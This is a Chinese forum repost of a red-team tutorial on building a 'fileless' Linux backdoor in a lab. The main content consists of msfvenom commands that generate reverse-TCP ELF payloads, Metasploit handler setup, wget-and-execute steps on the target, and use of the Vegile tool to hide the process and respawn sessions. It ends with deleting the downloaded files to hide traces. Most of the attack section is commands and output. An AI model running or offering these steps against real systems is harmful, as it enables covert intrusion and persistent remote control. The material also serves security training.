红队/白帽必经之路(22)——实战之怎样通过Metasploit 及Vegile 维吉尔工具 ...

打印 上一主题 下一主题

主题 864|帖子 864|积分 2592

 

 
   欢迎各位彦祖与热巴畅游本人专栏与博客

  你的三连是我最大的动力

  以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

    专栏跑道一

  
 

  ➡️网络空间安全——全栈前沿技术持续深入学习 

  

   
专栏跑道二


  
➡️ 24 Network Security -LJS 


  

  
​ 

  

    专栏跑道三

  
➡️ MYSQL REDIS Advance operation


  

    专栏跑道四

  
 

  ➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

  

    专栏跑道五

  
➡️RHCE-LJS[Linux高端骚操作实战篇]


    专栏跑道六

  
 

  ➡️数据布局与算法[考研+实际工作应用+C程序设计]

  

    专栏跑道七

  
 

  ➡️RHCSA-LJS[Linux初级及进阶骚技能]

  

  

 
上节回顾

 
   目次
  欢迎各位彦祖与热巴畅游本人专栏与博客
  你的三连是我最大的动力
  以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
  专栏跑道一
  ➡️网络空间安全——全栈前沿技术持续深入学习 
  专栏跑道二
  ➡️ 24 Network Security -LJS 
  专栏跑道三
  ➡️ MYSQL REDIS Advance operation
  专栏跑道四
  ➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
  专栏跑道五
  ➡️RHCE-LJS[Linux高端骚操作实战篇]​编辑​
  专栏跑道六
  ➡️数据布局与算法[考研+实际工作应用+C程序设计]
  专栏跑道七
  ➡️RHCSA-LJS[Linux初级及进阶骚技能]
  上节回顾
  1.实战-Linux 无文件木马程序
  1.1环境准备
  按照之前学习的方法生成一个恶意文件让目标体系执行来获取 shell
  再生成一个用来隐藏执行的后门
  补充:
   1.2启动 apache
  上传 Vegile 维吉尔工具到网站目次下方便 centos 下载
  注意:
  1.3获取 Linux 体系的 shell
  MSF 设置监听
  先安装下载工具
   添加执行权限
  利用 sessionID 连接 centos
  参数详解:
  注意:
  ​
  扩展:
  注意:
  ​
  1.4创建无文件后门程序
  补充:
  回到前面建立的 session 中下载用于隐藏历程的工具
  解压+cd+x
  下载用于隐藏执行的后门程序+x
  隐藏执行后门程序
  ​
  回到另一个 MSF 控制台查看 session
  ​
  查看一下我们注入到了哪个历程
  ​
   删除我们下载的所有文件
  注意:
  举例:
   
  
   
  

1.实战-Linux 无文件木马程序


1.1环境准备


    
  

  • Kali:192.168.1.53
  • Centos:192.168.1.63
  • 按照之前学习的方法生成一个恶意文件让目标体系执行来获取 shell
  1.                                                                                                            ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─#  msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=8080 -b "\x00" -f elf -o /var/www/html/xuegod-backdoor
  3. Found 3 compatible encoders
  4. Attempting to encode payload with 1 iterations of x64/xor
  5. x64/xor succeeded with size 175 (iteration=0)
  6. x64/xor chosen with final size 175
  7. Payload size: 175 bytes
  8. Final size of elf file: 295 bytes
  9. Saved as: /var/www/html/xuegod-backdoor
复制代码


再生成一个用来隐藏执行的后门

补充:
    
  

  • ghost 是什么意思? 还原体系?
   
  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod-ghost                                             
  3. Found 3 compatible encoders
  4. Attempting to encode payload with 1 iterations of x64/xor
  5. x64/xor succeeded with size 175 (iteration=0)
  6. x64/xor chosen with final size 175
  7. Payload size: 175 bytes
  8. Final size of elf file: 295 bytes
  9. Saved as: /var/www/html/xuegod-ghost
复制代码

 1.2启动 apache

  1.                                                                                                                  
  2. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  3. └─#  systemctl start apache2
  4.                                                                                                                  
  5. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  6. └─# systemctl enable apache2   #设置开机启动,
  7. Synchronizing state of apache2.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.
  8. Executing: /usr/lib/systemd/systemd-sysv-install enable apache2
  9. Created symlink '/etc/systemd/system/multi-user.target.wants/apache2.service' → '/usr/lib/systemd/system/apache2.service'.
  10.                                                                                                                  
  11. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  12. └─#  systemctl is-enabled apache2
  13. enabled
  14.          
复制代码

上传 Vegile 维吉尔工具到网站目次下方便 centos 下载

   

  • Vegile 官方下载链接
  • Vegile 常用方法:
  

  • ./Vegile --i 隐藏你的后门
  • ./Vegile --u 无穷复制你的 metasploit 会话,即使他被 kill,依然可以再次运行
  注意:
    
  

  • 木马肯定要放在 Vegile 目次下
  •  Vegile 一样平常用于维持 meterpreter 会话
  1. ┌──(root㉿kali-2024)-[/home/ljs/Desktop]
  2. └─#  cd /var/www/html/
  3.                                                                                                                  
  4. ┌──(root㉿kali-2024)-[/var/www/html]
  5. └─# rz                  
复制代码


1.3获取 Linux 体系的 shell

MSF 设置监听

  1. msf6 exploit(windows/smb/psexec) > back
  2. msf6 >  use exploit/multi/handler
  3. [*] Using configured payload linux/x64/meterpreter/reverse_tcp
  4. msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
  5. payload => linux/x64/shell/reverse_tcp
  6. msf6 exploit(multi/handler) > set LHOST 192.168.1.53
  7. LHOST => 192.168.1.53
  8. msf6 exploit(multi/handler) > set LPORT 8080  #改成8080,防止和上面实验的 4444 端
  9. 口冲突
  10. LPORT => 8080
  11. msf6 exploit(multi/handler) >  exploit -j  #在后台运行 handler,发现现在并没有 session,
  12. 因为客户端还没有执行
复制代码

 
   

  • 到 centos 操作体系下载执行文件来建立 session,为了模拟实战结果隐藏行为通过该 session进行操作
  先安装下载工具

  1. ┌──(root㉿kali-2024)-[/var/www/html]
  2. └─# wget 192.168.1.53/xuegod-backdoor
  3.                                                                                     
复制代码
 添加执行权限

  1. ┌──(root㉿kali-2024)-[/var/www/html]
  2. └─# chmod +x xuegod-backdoor     
  3.                              
复制代码
 
执行完成后获取到 session

  1. ┌──(root㉿kali-2024)-[/var/www/html]
  2. └─# ./xuegod-backdoor    
复制代码
利用 sessionID 连接 centos

  1. msf6 exploit(multi/handler) >  sessions -i 2
复制代码
参数详解:
    
  

  • -i <opt> Interact with the supplied session ID
  注意:
   

  • 这个 payload 中的 shell 是没有 bash 提示符的
  

 
扩展:

   

  • 怎样查看我们当进步程的名字和 PID?
  1. 查看网络连接状态:
  2. netstat -antup | grep 8080
复制代码

   

  • 可以看到我们的 pid 是 2406
  1. ps -aux | grep 2406
复制代码

   

  • 查看 IP 地址,发现找不到

  • 但是可以可以利用绝对路径
  

 
注意:
   

  • 上图的 session 要保持连接,先不要断开!后期面要利用到
  

1.4创建无文件后门程序

补充:

   

  • 新建终端窗口,MSF 控制台可以启动多个互不影响
  1. [-] Parse error: Unmatched quote: "' use exploit/multi/handler"
  2. msf6 > use exploit/multi/handler
  3. [*] Using configured payload linux/x64/shell/reverse_tcp
  4. msf6 exploit(multi/handler) >  set payload linux/x64/shell/reverse_tcp
  5. payload => linux/x64/shell/reverse_tcp
  6. msf6 exploit(multi/handler) > set LHOST 192.168.1.53
  7. LHOST => 192.168.1.53
  8. msf6 exploit(multi/handler) > set LPORT 4444
  9. LPORT => 4444
  10. msf6 exploit(multi/handler) > exploit -j
复制代码
回到前面建立的 session 中下载用于隐藏历程的工具

  1. wget 192.168.1.53/Vegile-master.zip
复制代码

解压+cd+x

  1. unzip Vegile-master.zip
  2. cd Vegile-master
  3. chmod +x Vegile
复制代码
下载用于隐藏执行的后门程序+x

  1. wget 192.168.1.53/xuegod-ghost
  2. chmod +x xuegod-ghost
复制代码
隐藏执行后门程序



   

  • 这里是退出 Vegile,不是退出当前的 session。
  回到另一个 MSF 控制台查看 session



   

  • 目标端口为 52038
  查看一下我们注入到了哪个历程

  1. msf6 exploit(multi/handler) >  sessions -i 3
复制代码


   

  • 同样是一个 sh 历程
  

 
 删除我们下载的所有文件

  1. rm -rf /root/Vegile-master
复制代码
  

  • 如遇到错误提示:
    1. ERROR: ld.so: object '/usr/local/lib/libprocesshider.so' from/etc/ld.so.preload cannot be preloaded: ignored.
    复制代码
  • 解决方法:
    1. echo "" > /etc/ld.so.preload # 64 位系统没有这个文件导致报错
    复制代码
  •  
  注意:

   

  • 删除时,也会把 xuegod-ghost 这个后门程序删除了。
  • 虽然文件被删除了,但会话,还是建立着了。
  • 删除我们所有文件之后程序仍旧正常执行。
  举例:


 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

汕尾海湾

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表